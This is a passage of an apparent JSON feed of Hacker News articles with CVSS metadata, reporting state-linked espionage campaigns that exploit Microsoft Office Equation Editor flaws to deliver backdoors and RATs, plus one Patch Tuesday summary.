arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. 
Used to exploit multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the weaponizer underpins targeted spear-phishing campaigns that deliver custom malware to unsuspecting high-value targets via malicious RTF documents.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to newly published research 
by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit** and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but with RedCore also containing features exclusive to it \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAs/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. 
\"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. 
\"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": 
"THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "description": "[](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that the CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of other major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, has already been targeted in the wild by several threat actor groups over the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. 
\n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for Mac, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also been addressed by the company. The vulnerability prevents some versions of Outlook for Mac from handling the encoding and display of email addresses properly, which causes antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to pass off their invalid certificates as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially crafted webpage that triggers a memory corruption error, though none of them has been exploited in the wild yet. 
\n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "cvss3": {}, "published": "2018-01-09T19:35:00", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "modified": "2018-01-11T07:11:17", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted 
by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the 
missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, so named after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution; this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:28", "description": "[](<https://thehackernews.com/images/-BTinSqvRUEs/WyKFLRrpXEI/AAAAAAAAxFI/TLQizch-N3MXO5s-YDgsXM5p-gmJxYlngCLcBGAs/s728-e100/cyber-espionage-watering-hole-attack.png>)\n\nCybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed 
Central Asian country in order to conduct watering hole attacks. \n \nThe campaign is believed to have been active covertly since fall 2017 but was spotted in March by security researchers from Kaspersky Labs, who have attributed these attacks to a Chinese-speaking threat actor group called **LuckyMouse**. \n \nLuckyMouse, also known as Iron Tiger, EmissaryPanda, APT 27 and Threat Group-3390, is the same group of Chinese hackers that was found targeting [Asian countries with Bitcoin mining malware](<https://thehackernews.com/2018/02/cyber-espionage-asia.html>) early this year. \n \nThe group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors. \n \nThis time the group chose as its target a national data center in an unnamed country in Central Asia, in an attempt to gain \"access to a wide range of government resources at one fell swoop.\" \n \nAccording to the researchers, the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks. \n\n\n[](<https://thehackernews.com/images/-QuiYgbvS6yU/WyKDXGDjLPI/AAAAAAAAxE8/xEaZMtqp9_04MT9bb0S1wAo4XspBBqD_gCLcBGAs/s728-e100/chinese-hackers.png>)\n\nAlthough LuckyMouse has been spotted using a widely used [Microsoft Office vulnerability](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) (CVE-2017-11882) to weaponize Office documents in the past, researchers have no proof of this technique being used in this particular attack against the data center. \n \nThe initial attack vector used in the attack against the data center is unclear, but researchers believe LuckyMouse may have conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center. 
\n \nThe attack against the data center eventually infected the targeted system with a piece of malware called HyperBro, a Remote Access Trojan (RAT) deployed to maintain persistence in the targeted system and for remote administration. \n\n\n> \"There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites,\" the researchers said in a [blog post](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) published today.\n\n> \"These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.\"\n\nAs a result of the waterholing attack, the compromised government websites redirected the country's visitors either to the Browser Exploitation Framework (BeEF), a penetration testing suite that focuses on the web browser, or to the ScanBox reconnaissance framework, which performs the same tasks as a keylogger. \n \nThe main command and control (C&C) server used in this attack is hosted on an IP address that belongs to a Ukrainian ISP, specifically to a MikroTik router running a firmware version released in March 2016. 
\n \nResearchers believe the Mikrotik router was explicitly hacked for the campaign in order to process the HyperBro malware's HTTP requests without detection.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-14T15:10:00", "type": "thn", "title": "Chinese Hackers Carried Out Country-Level Watering Hole Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-14T15:10:03", "id": "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "href": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:11", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhB2s9e9YTpk2G9Ucyf0f-n8ZPoo2tlQ8zsNhX3Jgv4IhzSFXQ9s6zdTZ4FIfFdO09TH0XSkClcJtsGp3XUT6H9wTEsMGT60qmoXfrdOsia0baz7OeUw8o6EIK2guCZij-URwXsPnEYhB8_hYySJXDT_CAFNWcXEehI3eqRZgwTO42zB-66bN4YPIAT>)\n\nA new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the 
adversary to gain complete control over the compromised endpoints.\n\nCisco Talos attributed the cyber campaign to a \"lone wolf\" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and Taliban dating all the way back to 2016.\n\nThe attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>) to execute a PowerShell command that's responsible for deploying additional malware to conduct reconnaissance on the machine.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgjwJb2EGN7CEzD088pZv9x_-bgg_iq1wev33AMsTmOKKf9LcO7QYxO7lYgEsByB74C5dYdzhbBXDik-EzAG4BWYB7bbw0tOra7nuFiGb0a4ryq1SQOfUlnEcTmVN_tiSjIDmvb8uybfl0BfHhsuKllu2SPfe2gEtc7hhUfgh74hNIelAJksFyTMPFJ>)\n\nCVE-2017-11882 [concerns](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) a [memory corruption](<https://thehackernews.com/2017/11/cobalt-strike-malware.html>) vulnerability that could be abused to run arbitrary code. The flaw, which is believed to have existed since 2000, was eventually addressed by Microsoft as part of its Patch Tuesday updates for November 2017.\n\nThe recon phase is followed by a similar attack chain that uses the aforementioned vulnerability to run a series of instructions that culminates in the installation of commodity malware such as DcRAT and QuasarRAT that come with a variety of functionalities right out of the box including remote shells, process management, file management, keylogging, and credential theft, thus requiring minimal effort on the part of the attacker.\n\nAlso observed during the 
cybercrime operation is a browser credential stealer for Brave, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera, Opera GX, and Yandex Browser.\n\n\"This campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims,\" the researchers [said](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html>). \"Commodity RAT families are increasingly being used by both crimeware and APT groups to infect their targets. These families also act as excellent launch pads for deploying additional malware against their victims.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-22T15:01:00", "type": "thn", "title": "'Lone Wolf' Hacker Group Targeting Afghanistan and India with Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-23T04:23:26", "id": "THN:FBCEC8F0CE0D3932FE4C315878C48403", "href": "https://thehackernews.com/2021/10/lone-wolf-hacker-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:31", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjHzJ_qgSssKi0XRWnJhDirWgqL4EHa5A-jFA6N1Mm3-sTnLTOFhjwFZ3ce97brsL7vtVD5joITWbti5hNnICJsFJIpy4bcrKg1ELhQeGjzfrQlEvcQbYmyN_DTGeLP7lFmZTU2jIr45uI2feJXOI_AZe5xhOr_q0AU0-U2nXeEkYORMSetLT4PaIxN/s728-e100/russi.jpg>)\n\nAt least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information.\n\nThe campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan.\n\n\"The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region,\" Check Point Research [said](<https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/>) in a report. 
\"Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks.\"\n\nThe infection chains of [El Machete](<https://malpedia.caad.fkie.fraunhofer.de/actor/el_machete>), a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy documents to deploy an open-source remote access trojan called [Loki.Rat](<https://github.com/TheGeekHT/Loki.Rat/>) that's capable of harvesting keystrokes, credentials, and clipboard data as well as carrying out file operations and executing arbitrary commands.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEipwxFpJPvd4PwFayruHDl_v1r8MWauiWrx8wIdliZdr8G6lRirPqrjRZmbPmfhkXvjaWF7y3UB6a9NRZ3ImXe3sB-wd2bCtBTcwPc2Y-pt-45hB0eyu7nUpmsOSKD6ZLZH-8aczH1b3T0lQYoX1KtSPYKLLfXhehQshFStDhg7TutwLf9aM0uzgh4Q/s728-e100/malware.jpg>)\n\nA second campaign is from the Iranian APT group known as [Lyceum](<https://thehackernews.com/2022/02/iranian-hackers-using-new-marlin.html>) that Check Point said launched a phishing attack using an email purportedly about \"Russian war crimes in Ukraine\" to deliver first-stage .NET and Golang droppers, which are then used to deploy a backdoor for running files retrieved from a remote server.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgMYUcKZ5xlMLlWlMH_CWnc2EL0BwBc1WvWbvRRc7TCz1EKGsHGWrXNKf2VdHyaTm83BZX-cD3KO1RCa_rNvXheN_16zhutQRMzg0Oe9runRnXlD4RppeLeLkLoEnfBzm_pGbEKE9i66BJJxifN1S012kLWJ6NcpGEzk9jXOKk-vELIH_w8CJFPwgoY/s728-e100/email.jpg>)\n\nAnother example is [SideWinder](<https://thehackernews.com/2021/07/sidecopy-hackers-target-indian.html>), a state-sponsored hacking crew that's said to operate in support of Indian political interests and with a specific focus on its neighbors China and [Pakistan](<https://cluster25.io/2021/09/10/a-rattlesnake-in-the-navy/>). 
